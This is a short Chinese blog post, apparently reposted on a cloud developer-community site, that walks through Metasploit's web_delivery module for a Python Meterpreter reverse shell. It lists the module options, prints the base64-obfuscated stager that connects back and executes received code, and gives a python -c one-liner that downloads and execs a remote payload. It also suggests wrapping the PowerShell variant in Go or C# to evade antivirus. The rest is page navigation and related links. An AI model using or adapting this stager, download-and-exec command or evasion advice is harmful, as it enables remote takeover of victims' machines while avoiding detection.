备案控制台
探索云世界
开发者社区 开发与运维 文章 正文

Pyhton加载Meterpreter Web_delivery代码

2017-08-25 866
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.
版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/77574162
Webdelivery的options
Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Python

生成的文件内容
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

调用命令
python -c "import urllib2; r = urllib2.urlopen('http://127.0.0.1:8080/test'); exec(r.read());"

使用PowerShell执行的payload语句可以封装到golang或者C#中实现免杀的目的
文章标签:
Python
C#
网络安全
Go
关键词:
web代码
神棍儿
目录
相关文章
士别三日wyx
|
安全 PHP
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
ctf.show 萌新模块 web13关, 这一关的考点是代码执行漏洞, 需要灵活的运用各种命令执行函数, 源码中过滤了system, exec, highlight函数, cat命令, congfig, php, 点和分号等关键字, 推荐使用反引号`` 进行绕过
士别三日wyx
383 0
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
这我可不懂
|
5月前
|
数据采集 JavaScript 前端开发
超越React,JS代码体积减少90%!它为何是2023年最好的Web框架?
超越React,JS代码体积减少90%!它为何是2023年最好的Web框架?
这我可不懂
59 0
小马过河R
|
9月前
|
移动开发 JavaScript 前端开发
扛着锄头写代码之vuejs和nodejs搞起web app系列
上次为了vue.js实现web app看的nodejs,首先感谢上次各位大神对nodejs初识不足的指点。本次烟纠了个小小的Demo,来总结和提疑。
小马过河R
73 0
扛着锄头写代码之vuejs和nodejs搞起web app系列
江湖十年007
|
10月前
|
监控 安全 测试技术
用 Python 撸一个 Web 服务器-第7章:重构——更好的组织代码
用 Python 撸一个 Web 服务器-第7章:重构——更好的组织代码
江湖十年007
56 0
轩公子谈技术
|
11月前
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
轩公子谈技术
123 0
是小鱼儿哈
|
12月前
|
测试技术
对个人博客系统进行web自动化测试(包含测试代码和测试的详细过程)(下)
对个人博客系统进行web自动化测试(包含测试代码和测试的详细过程)(下)
是小鱼儿哈
125 0
是小鱼儿哈
|
12月前
|
前端开发 Java 测试技术
对个人博客系统进行web自动化测试(包含测试代码和测试的详细过程)(上)
对个人博客系统进行web自动化测试(包含测试代码和测试的详细过程)(上)
是小鱼儿哈
193 0
洛阳泰山
|
安全 前端开发 Java
JAVA WEB之XSS防御工具类代码示例
JAVA WEB之XSS防御工具类代码示例
洛阳泰山
228 0
JAVA WEB之XSS防御工具类代码示例
VD_18028578624
|
人工智能 API 区块链
Web3技术丨佛萨奇系统开发技术介绍(代码搭建)原力佛萨奇系统丨MetaForce开发逻辑方案
Web3技术丨佛萨奇系统开发技术介绍(代码搭建)原力佛萨奇系统丨MetaForce开发逻辑方案
VD_18028578624
194 0
张继群
|
机器学习/深度学习 编解码 前端开发
Web 应用程序,python判断文件是否存在,不存在则创建,如何将飞桨中的代码在pycharm中运行
Web 应用程序,python判断文件是否存在,不存在则创建,如何将飞桨中的代码在pycharm中运行
张继群
415 1

热门文章

最新文章

  • 1
    Serverless 应用引擎常见问题之做的web服务计费如何解决
  • 2
    阿里云安全产品,Web应用防火墙与云防火墙产品各自作用简介
  • 3
    构建高效响应式Web界面:现代前端框架的比较
  • 4
    机器学习PAI常见问题之web ui 项目启动后页面打不开如何解决
  • 5
    在Python Web开发过程中:数据库与缓存,MySQL和NoSQL数据库的主要差异是什么?
  • 6
    组态软件之万维组态介绍(web组态、html组态、vue2/vue3组态)
  • 7
    Linux系统之部署web-check网站分析工具
  • 8
    《理解 WebSocket:Java Web 开发的实时通信技术》
  • 9
    使用Docker快速搭建Web服务器Nginx
  • 10
    jwt-auth插件实现了基于JWT(JSON Web Tokens)进行认证鉴权的功能。
  • 1
    Spring Boot 底层级探索系列 04 - Web 开发(2)
    15
  • 2
    PHP 8.1版本发布:引领Web开发新潮流
    7
  • 3
    如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
    11
  • 4
    PYTHON用GARCH、离散随机波动率模型DSV模拟估计股票收益时间序列与蒙特卡洛可视化
    19
  • 5
    用SPSS Modeler的Web复杂网络对所有腧穴进行关联规则分析3
    15
  • 6
    优化后端性能:提升Web应用响应速度的关键策略
    9
  • 7
    Flask性能优化:打造高性能Web应用
    11
  • 8
    [CTF]ctfshow web入门
    13
  • 9
    【Java Web】在 IDEA 中部署 Tomcat
    20
  • 10
    HTML标签详解 HTML5+CSS3+移动web 前端开发入门笔记(四)
    18

    • 相关课程

    更多
  • Python Web开发基础
  • Java Web开发系列课程 - Spring框架入门
  • 企业Web常用架构LAMP-LNMP实战
  • 高校精品课-西安交通大学-Web 编程技术
  • Java Web项目实战 - 图书商城
  • Java面试疑难点解析 - Java Web开发

    • 相关电子书

    更多
  • Web应用系统性能优化
  • 高性能Web架构之缓存体系
  • PWA:移动Web的现在与未来

    • 相关实验场景

    更多
  • 每个IT人都想学的“Web应用上云经典架构”实战
  • 使用SLB+2ECS+NAS,部署电商web网站的高可用架构
  • 1分钟SAE部署Web在线游戏
  • Html5和Webpack3:Webpack5的常见用法
  • Html5和Webpack2:Webpack5打包JS和样式表
  • Html5和Webpack1:Webpack5打包工具介绍
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)